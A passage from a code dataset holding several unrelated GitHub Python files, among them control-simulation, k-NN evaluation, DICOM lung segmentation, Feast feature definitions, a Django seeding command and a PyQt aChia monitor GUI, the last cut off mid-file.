range(0,len(impl0),10):\n #normalize\n x = (pos - mean[2])/std[2]\n v = (vel - mean[3])/std[3]\n x_ip = impl0[i,0]*std[0] + mean[0] #recover\n #get safety metric\n safe = (x_ip - pos)/vel\n safety.append(safe)\n lb.append(1.8)\n #prepare for model input\n impl0[i,2] = x\n impl0[i,3] = v\n x_r = Variable(torch.from_numpy(impl0[i]), requires_grad=False)\n x_r = torch.reshape(x_r, (1,nFeatures))\n x_r = x_r.to(device)\n ctrl = model(x_r)\n \n #integrate dynamics\n pos = pos + vel*dt + 0.5*ctrl.item()*dt*dt\n vel = vel + ctrl.item()*dt\n \n implem.append(ctrl.item())\n tr.append(tr0)\n tr0 = tr0 + dt\nprint(\"Implementation done!\")\n \n\nplt.figure(1)\nplt.plot(t, predic, color = 'green', label = 'predicted')\nplt.plot(t, actual, color = 'red', label = 'actual(optimal)')\nplt.plot(tr, implem, color = 'blue', label = 'implemented')\nplt.legend()\nplt.ylabel('Control')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('control_ocbf_bn.png')\n\nplt.figure(2) \nplt.plot(train_losses, color = 'green', label = 'train')\nplt.plot(test_losses, color = 'red', label = 'test')\nplt.legend()\nplt.ylabel('Loss')\nplt.xlabel('time')\nplt.ylim(ymin=0.)\nplt.show()\n# plt.savefig('Loss_ocbf_bn.png')\n\nplt.figure(3) \nplt.plot(tr, safety, color = 'green', label = 'safety')\nplt.plot(tr, lb, color = 'red', label = 'lower bound')\nplt.legend()\nplt.ylabel('Safety')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('Safety_ocbf_bn.png')\n\nprint(\"end\")","repo_name":"Weixy21/BarrierNet","sub_path":"Merging/merging-barriernet.py","file_name":"merging-barriernet.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"15062894600","text":"import pickle\nimport glob\nimport numpy as np\nimport sortedcontainers as sc\nfrom cloud_as_function import CloudAsFunction\nfrom multiprocessing import Process, Queue\n\n\ndef add_game(used_set, player, game):\n if used_set[player] is None:\n used_set[player] = []\n used_set[player].append(game)\n\n\ndef compare_to(valid_function, knn_set, k):\n sorted_list = sc.SortedList()\n for player, functions in knn_set.items():\n for unique_function in functions:\n try:\n score = valid_function.custom_distance_with(unique_function)\n if score < CloudAsFunction.theoric_max:\n sorted_list.add((score, player))\n except Exception as e:\n raise e\n \n player_count = {}\n for (score, player) in sorted_list[:k]:\n if player not in player_count.keys():\n player_count[player] = [0, 77777]\n player_count[player][0] += 1\n player_count[player][1] = min(score, player_count[player][1])\n \n max_score = 666666\n max_count = 0\n max_player = \"\"\n\n for player, element in player_count.items():\n count = element[0]\n score = element[1]\n if max_count < count:\n max_player = player\n max_count = count\n max_score = score\n elif max_count == count:\n if max_score > score:\n max_player = player\n max_score = score\n return max_player, max_score\n\n\ndef split(game_set, folds=10, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n i = 0\n for i in range(folds):\n functions_train_set = dict.fromkeys(games.keys())\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, CloudAsFunction(game, weights))\n else:\n add_game(functions_train_set, player, 
CloudAsFunction(game, weights))\n \n for player, games_of_him in functions_train_set.items():\n try:\n functions_train_set[player] = [CloudAsFunction.aggregate(games_of_him)]\n except Exception:\n print('cannot aggregate player, doesn\\'t do anything then, pass')\n raise\n \n yield functions_train_set, functions_validation_set\n return\n\n\ndef split_valid(game_set, folds=4):\n for i in range(folds):\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n if games_of_him is None:\n continue\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, game)\n else:\n continue\n \n yield functions_validation_set\n return\n\n\ndef run(functions_train_set, functions_validation_set, q):\n correct = 0\n incorrect = 0\n for key, value in functions_validation_set.items():\n if value is None:\n continue\n for one_game in value:\n try:\n prediction, score = compare_to(one_game, functions_train_set, 1)\n if key == prediction:\n correct += 1\n else:\n incorrect += 1\n except IndexError:\n continue\n q.put((correct, incorrect))\n\n\ndef simulate(games_dict, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n correct = 0\n incorrect = 0\n\n q_list = []\n\n print(\"<simulate>: begin splitting\")\n sets = split(games_dict, 10, weights)\n \n print(\"<simulate>: begin testing\")\n for i, (functions_train_set, functions_validation_set) in enumerate(sets):\n print(\"<simulate>: compute score fold {}\".format(i))\n computing = []\n valid_sets = split_valid(functions_validation_set)\n \n for sub_valid_set in valid_sets:\n q_list.append(Queue())\n computing.append(Process(target=run, args=(functions_train_set, sub_valid_set, q_list[-1])))\n computing[-1].start()\n for t, q in zip(computing, q_list):\n c, inc = q.get()\n correct += c\n incorrect += inc\n t.join()\n break\n return correct / (correct + incorrect)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n games = {}\n\n print(\"<general>: loading games\")\n\n for filename in glob.iglob('.\\small functions bt\\*.dat'):\n with open(filename, 'rb') as f:\n games[filename[18:-4]] = pickle.load(f)\n\n bef_value = -1\n conseq_desc = 0\n for i in range(5, 51, 5):\n CloudAsFunction.window = i\n value = simulate(games, weights=np.asarray([1, 121, 121, 121, 101, 101, 1]))\n if value < bef_value:\n conseq_desc += 1\n else:\n conseq_desc = 0\n if conseq_desc >= 5:\n break\n bef_value = value\n print(\"for window = {}, success is : {}\".format(i, value))\n print(\"for step = {}, success is : {}\".format(i, value))\n\n\n","repo_name":"gegeAi/fdcompo","sub_path":"optimize_interval.py","file_name":"optimize_interval.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33720995340","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport pydicom as dicom \nimport os\nfrom skimage.segmentation import clear_border\n\npath = \".\\scans\"\nsegmentation = []\nimagens = []\nseg_aux_paths = []\npaths_seg = []\npaths_img = []\n\ndef display(display_list):\n plt.figure(figsize=(15, 15))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.show()\n\ndef sort_list(list_str):\n 
x=[]\n dig=\"0123456789\"\n for i in list_str:\n p=\"\"\n for j in i:\n if j in dig:\n p+=j\n x.append(int(p))\n y=[]\n y.extend(x)\n x.sort()\n res=[]\n for i in x:\n res.append(list_str[y.index(i)])\n return res\n\ndef get_images_dir(path):\n for root, dirs, files in os.walk(path):\n files.sort()\n for file in files:\n relativePath = os.path.join(root, file)\n if('lung_mask' in relativePath):\n seg_aux_paths.append(relativePath)\n else:\n paths_img.append(relativePath)\n\n if('lung_mask' in root):\n aux_name = sort_list(seg_aux_paths)\n seg_aux_paths.clear()\n for filepath in aux_name:\n paths_seg.append(filepath)\n\ndef get_images(path):\n get_images_dir(path)\n print(len(paths_seg), len(paths_img))\n for i in range(len(paths_seg)):\n path_image, path_mask = paths_seg[i], paths_img[i]\n segmentation.append(dicom.dcmread(path_image).pixel_array)\n imagens.append(dicom.dcmread(path_mask).pixel_array)\n\nget_images(path)\n\npred = []\n\ndef normalize_canais(input_image):\n input_image = np.stack((input_image,)*1, axis=-1)\n return input_image\n\nkernel = np.ones((14, 14), 'uint8')\nkernel2 = np.ones((12, 12), 'uint8')\nfor i in range(len(segmentation)):\n \n img = normalize_canais(imagens[i])\n\n filtro = cv2.medianBlur(img, 5)\n erode_img = cv2.erode(filtro, kernel2, iterations=1)\n dilate_img = cv2.dilate(erode_img, kernel, iterations=1)\n # Aplica uma limiarização para binarizar a imagem\n ret, thresh = cv2.threshold(dilate_img, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n mask = np.vectorize(clear_border, signature='(n,m)->(n,m)')(thresh)\n\n pred.append(mask)\n #para ver de maneira visual a segmentacao\n #display([imagens[i], segmentation[i], mask])\n\ndef get_metrics_pixel_to_pixel(true, predict):\n fn = 0\n tp = 0\n tn = 0\n fp = 0\n for index in range(len(predict)):\n for indexInside in range(len(predict[index])):\n for indexDeep in range(len(predict[index][indexInside])):\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 255:\n tp += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 0:\n tn += 1\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 0:\n fn += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 255:\n fp += 1\n \n return fn, tp, tn, fp\n\nfn, tp, tn, fp = get_metrics_pixel_to_pixel(segmentation, pred)\nprecision = tp / (tp + fp)\nrecall = tp / (tp + fn)\nF1_score = 2 * (precision * recall) / (precision + recall)\ndice_Coefficient = 2 * tp / (2*tp + fp + fn)\nacuracia = (tp + tn) / (tp + fp + fn + tn)\nprint(\"False Negative: \" + str(fn) + \" True Negative: \" + str(fp))\nprint(\"False Positive: \" + str(tp) + \" True Positive: \" + str(tn))\nprint(\"Precision: \" + str(precision))\nprint(\"recall: \" + str(recall))\nprint(\"F1_score: \" + str(F1_score))\nprint(\"Dice Coefficient: \" + str(dice_Coefficient))\nprint(\"acuracia: \" + str(acuracia))\n\n\n","repo_name":"josepedroso/segmented_dicom_images","sub_path":"segmenta.py","file_name":"segmenta.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2584126987","text":"#!/usr/bin/env python3\nimport fbmatrix\nimport argparse\nimport time\nimport assembly.yuv420\nfrom ffpyplayer.player import MediaPlayer\nimport numpy as np\nfrom pyrr import Matrix44\n\ndef render():\n global bytearray, player\n global args\n \n videoAspect = screenAspect = 
args.columns/args.rows\n \n frame, val = player.get_frame()\n\n if frame:\n img, t = frame\n\n data = img.to_bytearray()\n size = img.get_size()\n \n videoAspect = size[0]/size[1]\n \n bytearray.setYUV420(data, size[0], size[1])\n\n time.sleep(val)\n\n M = np.eye(4, dtype=np.float32)\n\n if not args.stretch:\n if args.fit:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1))\n\n bytearray.setProjection(M)\n bytearray.render()\n\nimport common\n\nparser = argparse.ArgumentParser(description='Framebuffer RGB matrix player')\ncommon.add_args(parser)\nparser.add_argument('--fit', action='store_true', help='Fit the video as large as it can but maintaining aspect ratio. This means some part will be cut off')\nparser.add_argument('--stretch', action='store_true', help='Stretch the video to fit the screen exactly, which means aspect ratio will not be preserved. I really hate it when people do this.')\nparser.add_argument('videofile', help='Video to play')\n\nargs = parser.parse_args()\n\nplayer = MediaPlayer(args.videofile, ff_opts={'out_fmt':'yuv420p'})\n\nmatrix = common.renderer_from_args(args)\n\nbytearray = assembly.yuv420.bytearray(supersample = args.supersample)\n\nmatrix.run(render)\n","repo_name":"sharky5102/fbmatrix","sub_path":"fbmplay.py","file_name":"fbmplay.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"21007684308","text":"from datetime import timedelta\n\nimport pandas as pd\nfrom feast import (\n FeatureView,\n Field,\n)\nfrom feast.on_demand_feature_view import on_demand_feature_view\nfrom feast.types import Float32, Float64, String\n\nfrom data_sources import *\nfrom entities import *\n\ndriver_hourly_stats_view = FeatureView(\n name=\"driver_hourly_stats\",\n description=\"Hourly features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"conv_rate\", dtype=Float32),\n Field(name=\"acc_rate\", dtype=Float32),\n ],\n online=True,\n source=driver_stats,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\ndriver_daily_features_view = FeatureView(\n name=\"driver_daily_features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"daily_miles_driven\", dtype=Float32),\n Field(name=\"lat\", dtype=Float32),\n Field(name=\"lon\", dtype=Float32),\n ],\n online=True,\n source=driver_stats_push_source,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\n\n# Define an on demand feature view which can generate new features based on\n# existing feature views and RequestSource features\n@on_demand_feature_view(\n sources=[driver_hourly_stats_view, val_to_add_request],\n schema=[\n Field(name=\"conv_rate_plus_val1\", dtype=Float64),\n Field(name=\"conv_rate_plus_val2\", dtype=Float64),\n ],\n)\ndef transformed_conv_rate(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"conv_rate_plus_val1\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add\"]\n df[\"conv_rate_plus_val2\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add_2\"]\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n 
schema=[Field(name=\"avg_hourly_miles_driven\", dtype=Float64),],\n)\ndef avg_hourly_miles_driven(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"avg_hourly_miles_driven\"] = inputs[\"daily_miles_driven\"] / 24\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=f\"geohash_{i}\", dtype=String) for i in range(1, 7)],\n)\ndef location_features_from_push(inputs: pd.DataFrame) -> pd.DataFrame:\n import pygeohash as gh\n\n df = pd.DataFrame()\n df[\"geohash\"] = inputs.apply(lambda x: gh.encode(x.lat, x.lon), axis=1).astype(\n \"string\"\n )\n\n for i in range(1, 7):\n df[f\"geohash_{i}\"] = df[\"geohash\"].str[:i].astype(\"string\")\n return df\n","repo_name":"feast-dev/feast-workshop","sub_path":"module_2/feature_repo/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"} +{"seq_id":"24404239521","text":"import torch.nn as nn\nimport torch\nfrom timm.models.layers import trunc_normal_\nfrom torch.nn import functional as F\nin_place = True\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=0.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\ndef unpadding(y, target_size):\n H, W = target_size\n H_pad, W_pad = y.size(2), y.size(3)\n extra_h = H_pad - H\n extra_w = W_pad - W\n if extra_h > 0:\n y = y[:, :, :-extra_h]\n if extra_w > 0:\n y = y[:, :, :, :-extra_w]\n return y\nclass Conv3d(nn.Conv3d):\n\n def __init__(self, in_channels, out_channels, kernel_size, stride=(1,1,1), padding=(0,0,0), dilation=(1,1,1), groups=1, bias=False):\n super(Conv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2, keepdim=True).mean(dim=3, keepdim=True).mean(dim=4, keepdim=True)\n weight = weight - weight_mean\n std = torch.sqrt(torch.var(weight.view(weight.size(0), -1), dim=1) + 1e-12).view(-1, 1, 1, 1, 1)\n weight = weight / std.expand_as(weight)\n return F.conv3d(x, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n\ndef conv3x3x3(in_planes, out_planes, kernel_size=(3,3,3), stride=(1,1,1), padding=1, dilation=1, bias=False, weight_std=False):\n \"3x3x3 convolution with padding\"\n if weight_std:\n return Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\n else:\n return nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\nclass NoBottleneck(nn.Module):\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1, weight_std=False):\n super(NoBottleneck, self).__init__()\n self.weight_std = weight_std\n self.gn1 = nn.GroupNorm(16, inplanes)\n self.conv1 = conv3x3x3(inplanes, planes, kernel_size=(3, 3, 3), stride=stride, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.relu = nn.LeakyReLU(0.1,inplace=in_place)\n\n self.gn2 = nn.GroupNorm(16, planes)\n self.conv2 = conv3x3x3(planes, planes, kernel_size=(3, 3, 3), stride=1, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.downsample = downsample\n 
self.dilation = dilation\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.gn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n\n out = self.gn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n\n return out","repo_name":"SooLab/CCQ","sub_path":"code/network/utils_.py","file_name":"utils_.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"11442396512","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Permission\nfrom django.contrib.auth.models import Group\nfrom activities.models import Local, Activity, Dish\nfrom users.models import Guest, Chef, Monitor, Manager, Plan\nfrom django.contrib.contenttypes.models import ContentType\n\n\nclass Command(BaseCommand):\n args = '<foo bar ...>'\n help = 'our help string comes here'\n\n def _migrate(self):\n # Drop all tables\n print('Dropping tables...')\n\n User.objects.all().delete()\n Activity.objects.all().delete()\n Local.objects.all().delete()\n Dish.objects.all().delete()\n\n print('Dropping tables...OK')\n print('Populating database...')\n\n # ==================================================================================================\n # ==================================================================================================\n\n Group.objects.get_or_create(name='Guest')\n Group.objects.get_or_create(name='Monitor')\n Group.objects.get_or_create(name='Chef')\n Group.objects.get_or_create(name='Manager')\n print('Groups created...Ok')\n\n plan = ContentType.objects.get_for_model(Plan)\n Permission.objects.get_or_create(codename='free',\n name='Free',\n content_type=plan)\n Permission.objects.get_or_create(codename='lite',\n name='Lite',\n content_type=plan)\n Permission.objects.get_or_create(codename='premium',\n name='Premium',\n content_type=plan)\n print('Permissions created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n admin_admin = User(\n username='admin',\n email='admin@admin.com')\n admin_admin.set_password('admin')\n admin_admin.is_staff = True\n admin_admin.is_superuser = True\n admin_admin.save()\n\n print('Admins created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n guest1 = Guest(\n username='guest1',\n email='guest1@guest1.com',\n first_name='guest1',\n avatar='/images/user1.ico',\n )\n guest1.set_password('guest1')\n guest1.save()\n guest1.groups.add(Group.objects.get(name='Guest'))\n\n guest2 = Guest(\n username='guest2',\n email='guest2@guest2.com',\n first_name='guest2',\n )\n guest2.set_password('guest2')\n guest2.save()\n guest2.groups.add(Group.objects.get(name='Guest'))\n print('Guests created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n chef1 = Chef(\n username='chef1',\n email='chef1@chef1.com',\n first_name='chef1',\n )\n chef1.set_password('chef1')\n chef1.save()\n 
chef1.groups.add(Group.objects.get(name='Chef'))\n chef1.user_permissions.add(Permission.objects.get(name='Free'))\n\n chef2 = Chef(\n username='chef2',\n email='chef2@chef2.com',\n first_name='chef2',\n )\n chef2.set_password('chef2')\n chef2.save()\n chef2.groups.add(Group.objects.get(name='Chef'))\n chef2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Chefs created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n monitor1 = Monitor(\n username='monitor1',\n email='monitor1@monitor1.com',\n first_name='monitor1',\n )\n monitor1.set_password('monitor1')\n monitor1.save()\n monitor1.groups.add(Group.objects.get(name='Monitor'))\n monitor1.user_permissions.add(Permission.objects.get(name='Free'))\n\n monitor2 = Monitor(\n username='monitor2',\n email='monitor2@monitor2.com',\n first_name='monitor2',\n )\n monitor2.set_password('monitor2')\n monitor2.save()\n monitor2.groups.add(Group.objects.get(name='Monitor'))\n monitor2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Monitors created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n manager1 = Manager(\n username='manager1',\n email='manager1@manager1.com',\n first_name='manager1',\n )\n manager1.set_password('manager1')\n manager1.save()\n manager1.groups.add(Group.objects.get(name='Manager'))\n manager1.user_permissions.add(Permission.objects.get(name='Free'))\n\n manager2 = Manager(\n username='manager2',\n email='manager1@manager2.com',\n first_name='manager2',\n )\n manager2.set_password('manager2')\n manager2.save()\n manager2.groups.add(Group.objects.get(name='Manager'))\n manager2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Managers created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n activity1 = Activity(\n name='activity1',\n description='activity1Description',\n place='activity1Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2017-3-5',\n price_per_person=6,\n end_date='2017-7-29',\n owner=monitor1\n )\n activity1.save()\n activity1.assistants.add(guest1)\n activity1.assistants.add(guest2)\n\n activity2 = Activity(\n name='activity2',\n description='activity2Description',\n place='activity2Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2010-3-15',\n end_date='2017-7-29',\n price_per_person=6,\n owner=monitor2,\n )\n activity2.save()\n activity2.assistants.add(guest1)\n\n print('Activities... ok')\n # ==================================================================================================\n # ==================================================================================================\n\n local1 = Local(\n name='local1',\n description='description',\n address='address1',\n latitude=10.00,\n longitude=12.00,\n manager=manager1)\n local1.save()\n\n local2 = Local(\n name='local2',\n description='description',\n address='address2',\n latitude=10.00,\n longitude=12.00,\n manager=manager2)\n local2.save()\n\n print('Locals... 
Ok')\n\n # ==================================================================================================\n # Dish\n # ==================================================================================================\n\n dish1 = Dish(name='dish1', description='dish1Description', date='2017-02-5', hour='12:00', owner=chef1,\n max_assistants=3, contribution=5.6,\n photo='http://valenciaoberta.es/wp-content/uploads/2016/08/paella-2.jpg')\n dish1.save()\n dish1.assistants.add(guest1)\n dish1.assistants.add(guest2)\n dish2 = Dish(name='dish2', description='dish2Description', date='2017-03-15', hour='13:00', owner=chef1,\n max_assistants=3, contribution=4.0)\n dish2.save()\n dish3 = Dish(name='dish3', description='dish3Description', date='2017-03-25', hour='14:00', owner=chef2,\n max_assistants=1, contribution=2.0)\n dish3.save()\n dish4 = Dish(name='dish4', description='dish4Description', date='2017-08-29', hour='14:00', owner=chef2,\n max_assistants=5, contribution=5.0)\n dish4.save()\n dish5 = Dish(name='dish5', description='dish5Description', date='2017-8-25', hour='15:00', owner=chef2,\n max_assistants=10, contribution=3.6)\n dish5.save()\n\n print('Dishes... Ok')\n\n print('Populating database...OK\\n'\n 'Ready to use!')\n\n def handle(self, *args, **options):\n self._migrate()\n","repo_name":"andreslopezalbin/NetMeals","sub_path":"netmeals/management/commands/populatedb.py","file_name":"populatedb.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39411687751","text":"from BaseSolution import *\nfrom ListNode import *\nclass LinkedListCycle(BaseSolution):\n def __init__(self):\n BaseSolution.__init__(self)\n\n def solution(self, head):\n if not head: return False\n newHead = ListNode(-1)\n newHead.next = head\n slow = newHead\n fast = newHead.next\n while slow and fast and fast.next:\n if slow == fast: return True\n slow = slow.next\n fast = fast.next.next\n return False\n\n","repo_name":"caunion/leetcode","sub_path":"solutions/LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11308948400","text":"print('2자리의 양수를 입력하세요.')\n\nwhile True:\n no = int(input('값을 입력하세요.: '))\n if not(no < 10 or no > 99):\n break\n\nprint(f'입력받은 양수는 {no}입니다.')\n\n#De Morgan's law. 
If not 2 digit number, makes the user input again.","repo_name":"dennis1219/algorithm_study","sub_path":"python/01_basics/2digits1_de_morgan.py","file_name":"2digits1_de_morgan.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13849217521","text":"import sys,os\nfrom PyQt5.QtWidgets import QLineEdit, QGridLayout,QLabel ,QPushButton,QCheckBox \nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import QTimer\nfrom logging.handlers import RotatingFileHandler\n\n\n\nimport logging\nfrom run import achia_logger\nimport yaml\n\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n# # create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# # add formatter to ch\nch.setFormatter(formatter)\n\nfile_handler = RotatingFileHandler('achia-debug.log', maxBytes=2000, backupCount=10)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# # if logger.handlers:\n# # print(logger.handlers)\n# # for hnd in logger.handlers:\n# # logger.removeHandler(hnd)\n\n# # add ch to logger\n\n\n\n\nlogger_gui = logging.getLogger()\nlogger_gui.setLevel(logging.DEBUG)\n# if logger_gui.handlers:\n# print(logger_gui.handlers)\n# for hnd in logger_gui.handlers:\n# logger_gui.removeHandler(hnd)\n# # You can control the logging level\n# logger_gui.setLevel(logging.DEBUG)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent):\n super().__init__()\n self.widget = QtWidgets.QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n\n def emit(self, record):\n msg = self.format(record)\n self.widget.appendPlainText(msg)\n\n\nclass MyDialog(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.current_directory = os.path.dirname(__file__)\n self.note_icon = os.path.join( self.current_directory,'img','logo.ico' )\n self.file_name = 'achia.yaml'\n\n try:\n f = open(self.file_name, 'r')\n self.config = yaml.load(stream=f, Loader=yaml.Loader)\n f.close() \n if not isinstance(self.config, dict):\n self.config = dict()\n except:\n self.config = dict()\n print(self.config)\n self.chia_logger = achia_logger() \n \n\n \n\n logTextBox = QTextEditLogger(self)\n logTextBox.setLevel(logging.INFO)\n\n # You can format what is printed to text box\n logTextBox.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger_gui.addHandler(logTextBox)\n\n grid = QGridLayout()\n grid.setSpacing(2)\n \n e1_lable = QLabel('Token')\n e2_lable = QLabel('Machine ID')\n e3_lable = QLabel('Plotting Logs Path')\n\n self.e1 = QLineEdit(self.config.get(\"TOKEN\",\"Token xxxxxxxxxxxxxxxxxx\"))\n self.e2 = QLineEdit(self.config.get(\"MACHINE_ID\",\"xxxxxx\"))\n self.e3 = QLineEdit(self.config.get(\"PLOTTING_LOGS_PATH\",\"\"))\n self.e3.setPlaceholderText(\"Put in the folder of the plotting logs\")\n label = QLabel()\n label.setText('<a href=\"https://achia.co\">https://achia.co</a>')\n label.setOpenExternalLinks(True)\n \n grid.addWidget(e1_lable, 1, 0, 1,1)\n grid.addWidget(self.e1, 1, 1, 1,4)\n\n grid.addWidget(e2_lable, 2, 0,1,1)\n grid.addWidget(self.e2, 2, 1,1,4)\n\n grid.addWidget(e3_lable, 3, 0,1,1)\n grid.addWidget(self.e3, 3, 1,1,4)\n \n \n logo = QLabel()\n logo.setPixmap(QtGui.QPixmap(os.path.join( 
self.current_directory,'img','logo-text.png' )).scaledToWidth(160))\n version = QLabel(\"Version: 0.2\")\n \n self.startBtn=QPushButton('Start')\n self.endBtn=QPushButton('Stop')\n \n sublayout1 = QtWidgets.QVBoxLayout()\n sublayout1.addWidget(logo, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(label, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(version, alignment=QtCore.Qt.AlignCenter)\n self.is_debug = QCheckBox(\"Save debug log\")\n self.is_debug.setChecked(True)\n sublayout1.addWidget(self.is_debug)\n sublayout1.addWidget(self.startBtn)\n sublayout1.addWidget(self.endBtn)\n \n grid.addLayout(sublayout1, 4, 0, 6, 1)\n grid.addWidget(logTextBox.widget,4, 1, 6, 4)\n \n self.startBtn.clicked.connect(self.start)\n self.endBtn.clicked.connect(self.end)\n \n\n \n self.setLayout(grid)\n self.setGeometry(800, 500, 800, 300)\n self.setWindowTitle('aChia Dash Monitor')\n self.setWindowIcon(QtGui.QIcon(self.note_icon)) \n self.timer=QTimer()\n self.timer.timeout.connect(self.run)\n \n self.chia_logger.config = self.config\n \n def get_value(self):\n self.config[\"TOKEN\"] = self.e1.text() \n self.config[\"MACHINE_ID\"] = self.e2.text()\n self.config[\"PLOTTING_LOGS_PATH\"] = self.e3.text()\n with open(self.file_name, 'w') as yaml_file:\n yaml.dump(self.config, yaml_file, default_flow_style=False)\n\n def run(self):\n self.chia_logger.run() \n \n def start(self):\n try:\n self.get_value()\n logging.info(\"***********Starting aChia Dash Monitor***********\")\n logging.info(f\"TOKEN = 